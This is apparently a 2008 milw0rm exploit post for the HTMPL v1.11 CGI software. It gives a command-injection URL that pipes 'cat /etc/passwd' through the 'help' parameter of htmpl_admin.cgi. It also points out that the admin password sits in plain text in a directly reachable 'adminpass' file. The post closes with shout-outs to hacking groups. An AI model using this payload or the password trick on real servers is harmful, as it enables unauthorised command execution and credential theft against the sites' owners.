27 lines
No EOL
577 B
Text
27 lines
No EOL
577 B
Text
Software : HTMPL v1.11
|
|
Download Link : http://vmeste.org/templ_ex/doc/1.html
|
|
Vulnrability : Command Execution
|
|
Severity : High
|
|
Author : ZeN
|
|
Website : http://dusecurity.com / http://darkcode.me/
|
|
|
|
Exploit :
|
|
site.com/cgi-bin/htmpl_admin.cgi?help=|cat /etc/passwd
|
|
|
|
|
|
A few other little..... tricks
|
|
The admins password is kept plaintext in the file 'adminpass', you can just access it directly
|
|
in the same directory.
|
|
|
|
Thanks str0ke ;)
|
|
|
|
Shouts to :
|
|
DU Security Group
|
|
DarkCoders
|
|
WL-Group
|
|
Milw0rm
|
|
EnigmaGroup
|
|
IWannaHack
|
|
HackHound
|
|
|
|
# milw0rm.com [2008-12-10] |